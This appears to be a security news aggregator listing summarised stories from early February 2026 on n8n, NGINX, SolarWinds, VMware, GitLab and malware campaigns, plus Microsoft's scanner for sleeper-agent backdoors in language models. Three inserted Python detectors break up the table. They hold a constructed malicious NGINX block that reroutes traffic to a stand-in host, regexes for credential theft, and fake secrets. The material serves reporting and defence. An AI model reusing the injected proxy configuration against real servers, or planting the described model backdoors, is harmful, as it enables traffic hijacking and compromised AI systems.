Daily Brief
Find articles below, see 'DETAILS' for generated summaries
Total articles found: 12587
Checks for new stories every ~15 minutes
| Time | Source | Category | Title | Summary | |
|---|---|---|---|---|---|
| 2026-02-05 07:37:26 | theregister | VULNERABILITIES | Detecting Sleeper-Agent Backdoors in AI Language Models | Researchers identified sleeper-agent backdoors in AI models, where attackers embed hidden triggers during training, posing significant security risks.
These backdoors activate when the model receives a specific phrase, leading to unexpected and potentially harmful behavior.
Microsoft's AI red team developed a lightweight scanner to help enterprises detect such backdoors, focusing on unique attention patterns.
The "double triangle" attention pattern indicates a backdoored model, where the model fixates on the trigger phrase, ignoring the rest of the prompt.
Backdoored models may leak portions of their poisoned training data due to memorization of unique sequences.
Unlike traditional software backdoors, AI backdoors can be triggered by partial phrases, complicating detection efforts.
The research provides new methods for defenders to identify compromised models, even with incomplete trigger phrases.
This development underscores the need for robust AI model security measures to prevent potential exploitation. | Details |
| 2026-02-05 06:20:18 | thehackernews | VULNERABILITIES | Critical n8n Vulnerability Enables Remote Command Execution Risks | A critical flaw in the n8n automation platform, CVE-2026-25049 (CVSS 9.4), allows arbitrary system command execution on the host running n8n.
The vulnerability stems from inadequate input sanitization that bypasses the earlier fix for CVE-2025-68613, and is exploitable by any authenticated user with permission to modify workflows.
Exploitation involves crafting a workflow exposed through a publicly accessible webhook, so the attacker can inject a remote code execution payload into the workflow and trigger it to run commands on the server.
Successful attacks could lead to credential theft, data exfiltration, and installation of persistent backdoors, significantly impacting operational security.
Security researchers, including those from Endor Labs and Pillar Security, emphasize the need for runtime checks alongside compile-time type enforcement.
Users are advised to apply patches immediately or follow the recommended workarounds to mitigate the risk of exploitation and protect sensitive information. | Details |
| 2026-02-05 05:49:45 | theregister | MISCELLANEOUS | Microsoft Appoints New Leaders to Enhance Security and Engineering Quality | Microsoft CEO Satya Nadella has appointed Charlie Bell as the new engineering quality czar, shifting him from his previous role as executive vice president for security.
Bell's appointment is part of a "Quality Excellence Initiative" aimed at improving accountability and progress in delivering high-quality experiences globally.
The initiative may address issues such as Azure outages and problematic Windows patches, potentially linked to Microsoft's AI-driven code development.
Hayete Gallot, formerly of Google Cloud, rejoins Microsoft as executive vice president responsible for security, focusing on enhancing security priorities.
Gallot previously played key roles in developing Microsoft's Windows and Office franchises and will now oversee the Security Solution Area.
These leadership changes reflect Microsoft's dual focus on bolstering security measures and improving the quality of its engineering outputs.
The appointments come amid ongoing challenges, including recent security breaches and the need to manage AI integration effectively. | Details |
| 2026-02-05 04:59:37 | thehackernews | VULNERABILITIES | React2Shell Exploit Targets NGINX Servers for Web Traffic Hijacking | Cybersecurity researchers identified an active campaign exploiting the React2Shell vulnerability (CVE-2025-55182) to hijack web traffic on compromised NGINX servers.
Attackers use malicious NGINX configurations to intercept and reroute legitimate web traffic through their own infrastructure, affecting Asian and government domains.
The exploitation involves shell scripts injecting malicious configurations into NGINX, redirecting traffic via the "proxy_pass" directive to attacker-controlled domains.
A multi-stage toolkit facilitates persistence and the creation of malicious configuration files, with 1,083 unique IP addresses involved in the exploitation efforts.
GreyNoise reported that two IP addresses account for 56% of observed exploitation attempts, indicating a concentrated effort by threat actors.
Post-exploitation payloads include cryptomining binaries as well as reverse shells; the reverse shells point to interest in interactive access rather than purely automated resource extraction.
The campaign's discovery coincides with a coordinated reconnaissance effort targeting Citrix ADC and Netscaler Gateway infrastructures, highlighting a broader threat landscape. | Details |
| 2026-02-04 23:27:46 | bleepingcomputer | CYBERCRIME | NGINX Servers Compromised to Redirect User Traffic in Asia | Datadog Security Labs discovered a campaign targeting NGINX servers that redirects user traffic through attacker-controlled infrastructure, primarily affecting Asian domains, including government and educational sites.
Attackers modify NGINX configuration files by injecting malicious 'location' blocks whose 'proxy_pass' directive reroutes traffic to domains under their control.
Because 'proxy_pass' is a routine reverse-proxy and load-balancing directive, the injected blocks look like ordinary configuration and do not trigger typical security alerts.
A scripted multi-stage toolkit injects the malicious configurations, making these attacks difficult to detect without specific monitoring.
Request headers are preserved and the traffic is forwarded on to its intended destination, so users see nothing wrong, which complicates detection further.
Organizations using NGINX, especially those in targeted regions, should monitor configuration files for unauthorized changes and audit server configurations continuously. | Details |
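Both NGINX items above (the React2Shell campaign and the Datadog Security Labs write-up) come down to one indicator: a `location` block whose `proxy_pass` points somewhere it should not. The Python below is an added example, not tooling from GreyNoise or Datadog. It parses an NGINX configuration, resolves each `proxy_pass` target to its upstream host, and reports any host that is not on an operator-maintained allow-list. The sample configuration, the `203.0.113.10` address (from the documentation range) and the `TRUSTED_UPSTREAMS` set are constructed for the example.

```python
"""Audit an NGINX configuration for location blocks that proxy to unexpected upstreams.

Added example for the two NGINX items above; not Datadog's or GreyNoise's code.
It implements the recommended configuration monitoring by flagging any
`proxy_pass` whose upstream host is outside an allow-list.
"""
import re
from urllib.parse import urlsplit

# Constructed sample config: a normal reverse proxy to a local upstream plus an
# injected catch-all location that forwards everything to an attacker-style host.
SAMPLE_CONF = """
http {
    upstream app { server 127.0.0.1:8080; }
    server {
        listen 80;
        server_name example.gov.test;
        location /api/ {
            proxy_pass http://app;
            proxy_set_header Host $host;
        }
        location / {
            proxy_pass http://203.0.113.10:8080$request_uri;
            proxy_set_header Host $host;
            proxy_set_header X-Forwarded-For $remote_addr;
        }
    }
}
"""

# Hypothetical allow-list of upstream names and hosts; an operator would fill
# this from their own deployment (upstream {} names, loopback, unix sockets).
TRUSTED_UPSTREAMS = {"app", "127.0.0.1", "localhost", "unix:"}

# "location [modifier] <path> {" ; the trailing "{" is the last char matched.
LOCATION_RE = re.compile(r"location\s+(?:[=~*^]+\s+)?(\S+)\s*\{")
PROXY_PASS_RE = re.compile(r"proxy_pass\s+([^;]+);")


def _block_body(text: str, start: int) -> str:
    """Return the text inside the brace block that opens at text[start] == '{'."""
    depth = 0
    for i in range(start, len(text)):
        if text[i] == "{":
            depth += 1
        elif text[i] == "}":
            depth -= 1
            if depth == 0:
                return text[start + 1:i]
    raise ValueError("unbalanced braces in nginx config")


def upstream_host(target: str) -> str:
    """Extract the upstream name or host from a proxy_pass argument.

    proxy_pass accepts http://name, http://host:port/path and unix: sockets.
    NGINX variables ($request_uri, $host, ...) are stripped before parsing; a
    target that is *only* variables comes back unparsed and is therefore
    flagged, which is the right default for a dynamic proxy destination.
    """
    target = target.strip()
    if target.startswith("unix:"):
        return "unix:"
    target = re.sub(r"\$\w+", "", target)
    return urlsplit(target).hostname or target


def find_suspicious_proxies(conf: str, trusted=TRUSTED_UPSTREAMS):
    """Return (location path, proxy_pass target) for every untrusted upstream."""
    findings = []
    for m in LOCATION_RE.finditer(conf):
        path = m.group(1)
        body = _block_body(conf, m.end() - 1)
        for pp in PROXY_PASS_RE.finditer(body):
            if upstream_host(pp.group(1)) not in trusted:
                findings.append((path, pp.group(1).strip()))
    return findings


if __name__ == "__main__":
    for path, target in find_suspicious_proxies(SAMPLE_CONF):
        print(f"[!] location {path} proxies to untrusted upstream {target}")
```

Run it against the rendered configuration (`nginx -T`) on a schedule or from a file-integrity alert on the NGINX config directory; a freshly added `location` whose `proxy_pass` targets a public IP is exactly the artifact this campaign leaves behind.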
| 2026-02-04 21:20:27 | bleepingcomputer | VULNERABILITIES | Critical Vulnerabilities in n8n Platform Allow Full Server Control | Multiple critical vulnerabilities in the n8n open-source workflow automation platform, tracked as CVE-2026-25049, enable authenticated users to execute remote code and take control of the host server.
Researchers identified flaws in n8n's sanitization mechanism, allowing attackers to bypass a previous patch and exploit server-side JavaScript expressions for unrestricted access.
Exploiting these vulnerabilities could lead to the theft of stored credentials, API keys, and sensitive configuration files, as well as unauthorized access to connected cloud accounts and AI workflows.
The n8n team released version 2.4.0 to address these issues, but further analysis revealed incomplete fixes, prompting additional updates to versions 1.123.17 and 2.5.2.
Security firms recommend updating to the latest n8n versions, rotating encryption keys, and reviewing workflows for suspicious activity to mitigate potential risks.
While no public exploits of CVE-2026-25049 have been reported, GreyNoise detected significant probing activity targeting exposed n8n endpoints, suggesting increased interest from cybercriminals.
Organizations using n8n should remain vigilant and apply recommended security measures to prevent unauthorized access and data breaches. | Details |
| 2026-02-04 21:14:24 | theregister | CYBERCRIME | AI-Assisted Attack Breaches AWS Environment in Under 10 Minutes | An intruder gained administrative privileges in an AWS cloud environment in under 10 minutes, using AI to automate the attack.
Sysdig's Threat Research Team observed the attack, noting the use of large language models for reconnaissance, privilege escalation, and lateral movement.
The attackers started from valid test credentials found in publicly readable Amazon S3 buckets, highlighting the risk of exposed access keys and the importance of credential management.
The breach involved compromising 19 AWS principals, leveraging AI-generated code with Serbian comments, and accessing sensitive data across various AWS services.
The attackers also engaged in "LLMjacking", invoking multiple cloud-hosted AI models with the stolen access, raising concerns about unauthorized model usage billed to the victim.
Recommendations include enforcing least privilege, restricting sensitive permissions, and locking down S3 buckets to prevent unauthorized access.
This incident exemplifies the growing trend of AI-assisted cyberattacks, underscoring the need for robust identity security and access management practices. | Details |
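The least-privilege recommendation in the Sysdig item above is easier to act on with a concrete check. The Python below is an added example, not Sysdig's tooling: it lints an IAM policy document for Allow statements that grant the permissions an intruder holding leaked keys reaches for first, reproducing IAM's wildcard action matching. The two policy documents and the `SENSITIVE_ACTIONS` list are constructed for the example; `bedrock:InvokeModel` is on the list because LLMjacking consists of invoking hosted models with someone else's credentials.

```python
"""Lint an IAM policy document for Allow statements granting sensitive permissions.

Added example for the Sysdig item above; not Sysdig's tooling.  The policies and
the SENSITIVE_ACTIONS list below are constructed for the example.
"""
import fnmatch
import json

# Permissions a thief holding leaked keys reaches for: minting new credentials,
# escalating through IAM, reading S3 wholesale, and invoking hosted models
# (LLMjacking).  Hypothetical starter list; extend it for your environment.
SENSITIVE_ACTIONS = [
    "iam:CreateAccessKey",
    "iam:CreateUser",
    "iam:AttachUserPolicy",
    "iam:PutUserPolicy",
    "iam:PassRole",
    "sts:AssumeRole",
    "s3:GetObject",
    "s3:ListAllMyBuckets",
    "bedrock:InvokeModel",
]

# Constructed samples: an over-broad "test" policy of the kind that turns a
# leaked access key into an account takeover, and a properly scoped one.
OVERBROAD_POLICY = json.loads("""
{
  "Version": "2012-10-17",
  "Statement": [
    {"Sid": "TestAdmin", "Effect": "Allow", "Action": ["iam:*", "s3:*"], "Resource": "*"},
    {"Sid": "KeepLogs", "Effect": "Deny", "Action": "logs:DeleteLogGroup", "Resource": "*"}
  ]
}
""")

SCOPED_POLICY = json.loads("""
{
  "Version": "2012-10-17",
  "Statement": {
    "Sid": "ReadOneBucket", "Effect": "Allow",
    "Action": ["s3:GetObject", "s3:ListBucket"],
    "Resource": ["arn:aws:s3:::app-assets", "arn:aws:s3:::app-assets/*"]
  }
}
""")


def _as_list(value):
    """IAM lets Statement, Action and Resource be a single string or a list."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def lint_policy(policy: dict):
    """Return (sid, sensitive_action, resource, severity) for each Allow statement
    whose Action pattern covers a sensitive action.

    IAM action matching is case-insensitive and supports '*' and '?', which
    fnmatch reproduces once both sides are lower-cased.  Severity is 'high' when
    the grant applies to every resource, 'review' otherwise.
    """
    findings = []
    for stmt in _as_list(policy.get("Statement")):
        if stmt.get("Effect") != "Allow":
            continue  # Deny statements only ever narrow access
        sid = stmt.get("Sid", "<no sid>")
        patterns = [a.lower() for a in _as_list(stmt.get("Action"))]
        resources = _as_list(stmt.get("Resource"))
        for action in SENSITIVE_ACTIONS:
            if any(fnmatch.fnmatchcase(action.lower(), p) for p in patterns):
                for res in resources:
                    severity = "high" if res == "*" else "review"
                    findings.append((sid, action, res, severity))
    return findings


if __name__ == "__main__":
    for name, pol in (("overbroad", OVERBROAD_POLICY), ("scoped", SCOPED_POLICY)):
        for sid, action, res, sev in lint_policy(pol):
            print(f"[{sev}] {name}/{sid}: {action} on {res}")
```

The lint reads only the policy document, so it does not see NotAction, Condition blocks, permission boundaries or SCPs; treat a 'high' finding as a prompt to pull the principal's effective permissions with the IAM policy simulator rather than as a verdict.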
| 2026-02-04 18:19:16 | theregister | VULNERABILITIES | Urgent Patch Required for Critical SolarWinds Web Help Desk Flaw | A critical vulnerability, CVE-2025-40551, in SolarWinds Web Help Desk is being exploited, prompting urgent patching by U.S. federal agencies by Friday.
The flaw, a deserialization of untrusted data, allows unauthenticated remote code execution, letting attackers run OS commands on the host.
SolarWinds released a patch for this and five other vulnerabilities in version 2026.1, following reports from Horizon3.ai and watchTowr researchers.
The Cybersecurity and Infrastructure Security Agency (CISA) has mandated a three-day patch deadline, indicating the severity of the threat.
Previously, SolarWinds Web Help Desk was targeted in 2024, with vulnerabilities making it to CISA's Known Exploited Vulnerabilities catalog.
Rapid7 anticipates increased exploitation as technical details emerge, though current attacker identities and objectives remain unknown.
The expedited response underscores the critical nature of timely vulnerability management and patching to mitigate potential security breaches. | Details |
| 2026-02-04 17:55:20 | thehackernews | VULNERABILITIES | Microsoft Introduces Scanner to Detect AI Model Backdoors | Microsoft has developed a lightweight scanner designed to detect backdoors in open-weight large language models (LLMs), aiming to enhance trust in AI systems.
The scanner uses three observable signals to identify backdoors, maintaining a low false positive rate and requiring no additional model training.
Backdoor detection focuses on identifying sleeper agents in LLMs, which remain dormant until triggered by specific inputs.
Microsoft's approach relies on extracting memorized training data and analysing output patterns to identify potential backdoors in AI models.
The scanner's methodology is applicable across common GPT-style models but requires access to model files, limiting its use on proprietary models.
This initiative is part of Microsoft's broader effort to expand its Secure Development Lifecycle to address AI-specific security challenges.
The move reflects growing concerns about AI security, as AI systems introduce multiple entry points for potentially malicious inputs. | Details |
| 2026-02-04 17:40:29 | bleepingcomputer | VULNERABILITIES | CISA Warns of Exploited VMware ESXi Flaw in Ransomware Attacks | CISA confirmed ransomware groups are exploiting a high-severity VMware ESXi vulnerability (CVE-2025-22225), initially used in zero-day attacks and patched by Broadcom in March 2025.
The vulnerability allows an attacker with privileges inside the VMX process to perform an arbitrary write into the ESXi kernel, escaping the virtual machine's sandbox.
Affected VMware products include ESXi, Fusion, Cloud Foundation, vSphere, Workstation, and Telco Cloud Platform, posing a risk to enterprises using these systems.
CISA added this flaw to its Known Exploited Vulnerabilities catalog and mandated federal agencies to secure systems by March 25, 2025, under Binding Operational Directive 22-01.
Chinese-speaking threat actors have reportedly been exploiting these vulnerabilities since February 2024, indicating a sophisticated attack pattern.
Organizations are advised to apply vendor-recommended mitigations or discontinue use if mitigations are unavailable to prevent potential data breaches.
The widespread deployment of VMware products makes them attractive targets for ransomware gangs, emphasizing the need for timely patch management and system updates. | Details |
| 2026-02-04 17:34:01 | thehackernews | MALWARE | DEAD#VAX Campaign Uses IPFS-Hosted Files to Deploy AsyncRAT | Researchers have identified a new malware campaign, DEAD#VAX, which uses IPFS-hosted Virtual Hard Disk (VHD) files to deploy AsyncRAT, a remote access trojan, bypassing traditional detection methods.
The attack initiates with phishing emails delivering VHD files disguised as PDF purchase orders, leveraging the decentralized InterPlanetary Filesystem to evade detection.
AsyncRAT, an open-source remote access trojan, grants attackers extensive control over infected systems, including keylogging, screen capture, and remote command execution.
The malware employs extreme script obfuscation and runtime decryption, injecting shellcode into trusted Windows processes to execute entirely in memory, minimizing forensic artifacts.
The infection chain involves multi-stage execution, utilizing Windows Script Files, obfuscated batch scripts, and PowerShell loaders to deliver encrypted shellcode.
This fileless execution strategy complicates detection and forensic analysis, as the malware operates within trusted processes, reducing its visibility to endpoint security solutions.
The campaign's use of trusted file formats and memory-resident execution reflects a growing trend in advanced malware tactics, posing significant challenges for cybersecurity defenses. | Details |
| 2026-02-04 15:48:54 | bleepingcomputer | VULNERABILITIES | CISA Urges Immediate Patch for Exploited GitLab Vulnerability | CISA has mandated federal agencies to patch a five-year-old GitLab vulnerability (CVE-2021-39935) by February 24, 2026, due to active exploitation in the wild.
The vulnerability is a server-side request forgery (SSRF) in the CI Lint API, which lets an attacker make the GitLab instance issue requests on their behalf, including to internal hosts.
Affected GitLab versions include all from 10.5 before 14.3.6, 14.4 before 14.4.4, and 14.5 before 14.5.2, requiring immediate updates to mitigate threats.
CISA's directive, BOD 22-01, applies to federal agencies but recommends all organizations, including private sector entities, to prioritize patching efforts.
Shodan reports over 49,000 devices with a GitLab fingerprint online, predominantly in China, highlighting the widespread exposure and potential attack surface.
GitLab's platform, used by over 30 million users and 50% of Fortune 100 companies, underscores the critical need for prompt action to secure infrastructure.
Organizations are advised to apply vendor-recommended mitigations or discontinue use of vulnerable products if patches are unavailable to prevent exploitation. | Details |
| 2026-02-04 15:16:03 | bleepingcomputer | DATA BREACH | Flare Finds 10,000 Docker Images Leaking Sensitive Credentials | Flare's 2025 research identified over 10,000 Docker Hub images leaking critical secrets, including API keys and cloud tokens, affecting more than 100 organizations across various sectors.
Non-human identities, such as tokens and API keys, are essential for modern software but pose significant risks when improperly managed or exposed in public repositories.
The Snowflake breach in 2024 saw 165 organizations compromised through leaked credentials, exposing sensitive data from companies like AT&T and Ticketmaster.
Home Depot's systems were accessible for over a year due to a leaked GitHub token, highlighting gaps in credential governance and automated secret detection.
Red Hat's GitLab breach involved the exfiltration of private repositories containing embedded credentials, turning code storage into an unintentional credential store.
The incidents reveal systemic flaws in managing non-human identities, urging organizations to treat them with the same rigor as human credentials.
Security teams are advised to integrate automated secret scanning, adopt ephemeral credentials, and monitor public registries to prevent unauthorized access.
Specialized tools for threat exposure management, such as Flare, offer continuous scanning and remediation capabilities to safeguard against credential leaks. | Details |
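The automated secret scanning recommended above is straightforward to run on an image's layers before they reach a registry. The Python below is an added example, not Flare's scanner: it builds a small Docker layer tarball in memory from constructed files (the AWS key is AWS's documented example value; the GitHub token and SSH key are fabricated), then scans every regular text file in the layer for a handful of credential patterns.

```python
"""Scan a Docker image layer tarball for leaked credentials.

Added example for the Flare item above; not Flare's tooling.  The layer is
built in memory from constructed sample files so the scan runs offline.
"""
import io
import re
import tarfile

# Credential formats worth catching in any image.  The generic rule catches
# KEY=value style assignments whose name mentions a secret/password/token.
SECRET_PATTERNS = {
    "aws_access_key_id": re.compile(r"\b(?:AKIA|ASIA)[0-9A-Z]{16}\b"),
    "github_token": re.compile(r"\bgh[pousr]_[A-Za-z0-9]{36}\b"),
    "private_key": re.compile(r"-----BEGIN (?:RSA |EC |OPENSSH )?PRIVATE KEY-----"),
    "generic_secret": re.compile(
        r"(?i)(?:secret|password|passwd|token)[a-z0-9_]*\s*[=:]\s*['\"]?([^\s'\"]{8,})"
    ),
}


def build_sample_layer() -> bytes:
    """Construct a layer tar: one clean file and three files leaking secrets.

    The AWS access key is the example value from AWS's own documentation; the
    GitHub token and SSH key are fabricated and not real credentials.
    """
    files = {
        "app/config.py": b"DEBUG = False\nDB_HOST = 'db'\n",
        "app/.env": (
            b"AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE\n"
            b"AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\n"
        ),
        "root/.git-credentials": (
            b"https://bot:ghp_0123456789abcdefghijABCDEFGHIJ012345@github.com\n"
        ),
        "root/.ssh/id_rsa": (
            b"-----BEGIN OPENSSH PRIVATE KEY-----\n"
            b"b3BlbnNzaC1rZXktdjEAAAAA...\n"
            b"-----END OPENSSH PRIVATE KEY-----\n"
        ),
    }
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for path, content in files.items():
            info = tarfile.TarInfo(name=path)
            info.size = len(content)
            tar.addfile(info, io.BytesIO(content))
    return buf.getvalue()


def scan_layer(layer_bytes: bytes, max_file_size: int = 5 * 1024 * 1024):
    """Return a sorted list of (path, pattern_name) for every file with a hit.

    Only regular files are inspected; oversized or binary (NUL-containing)
    files are skipped so the scan stays cheap enough to run on every push.
    """
    hits = []
    with tarfile.open(fileobj=io.BytesIO(layer_bytes), mode="r:*") as tar:
        for member in tar:
            if not member.isfile() or member.size > max_file_size:
                continue
            data = tar.extractfile(member).read()
            if b"\x00" in data:
                continue
            text = data.decode("utf-8", errors="replace")
            for name, pattern in SECRET_PATTERNS.items():
                if pattern.search(text):
                    hits.append((member.name, name))
    return sorted(hits)


if __name__ == "__main__":
    for path, name in scan_layer(build_sample_layer()):
        print(f"[!] {path}: {name}")
```

`docker save image | tar -x` unpacks each layer as its own tarball; feed every one of them to `scan_layer` and fail the build on any hit. A secret added in an early layer survives a later `rm` in the Dockerfile, which is why the scan must cover each layer rather than the final merged filesystem.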
| 2026-02-04 14:21:28 | bleepingcomputer | MALWARE | EDR Killer Exploits Revoked Driver to Disable Security Tools | Cybercriminals are leveraging a revoked EnCase kernel driver in a new EDR killer tool designed to disable endpoint detection and response systems.
The attackers used a BYOVD technique, introducing a legitimate but vulnerable driver to gain kernel-level access and terminate security software processes.
The attack involved compromised SonicWall SSL VPN credentials and exploited the absence of multi-factor authentication for VPN access, facilitating network infiltration.
The malicious tool disguises itself as a firmware update utility, using the EnPortv.sys driver to disable 59 different security processes on the host system.
Windows still loads drivers signed with older certificates under a compatibility exception, which the attackers relied on to get the revoked driver loaded despite Microsoft's defenses.
Huntress researchers suggest enabling MFA, monitoring VPN logs, and deploying WDAC and ASR rules to block vulnerable drivers as preventive measures.
The intrusion was linked to potential ransomware activity, though the attack was halted before the ransomware could be deployed. | Details |
| 2026-02-04 14:12:13 | thehackernews | NATION STATE ACTIVITY | Amaranth-Dragon Exploits WinRAR Flaw in Southeast Asia Espionage | China-linked Amaranth-Dragon group targets Southeast Asian governments with espionage campaigns, leveraging a WinRAR vulnerability for code execution.
Check Point Research attributes these activities to the APT41 ecosystem, with operations coinciding with political and security events in the region.
The campaigns employ spear-phishing emails to distribute malicious RAR files, exploiting CVE-2025-8088 for persistent access.
Attackers use DLL side-loading techniques, deploying Amaranth Loader to retrieve and execute encrypted payloads in memory.
The campaigns demonstrate advanced operational security by restricting C2 communication to specific regional IP addresses.
Amaranth-Dragon's tactics include using trusted cloud platforms like Dropbox to bypass traditional defenses, indicating high technical proficiency.
The group's activities highlight the ongoing threat posed by nation-state actors using sophisticated techniques for geopolitical intelligence gathering. | Details |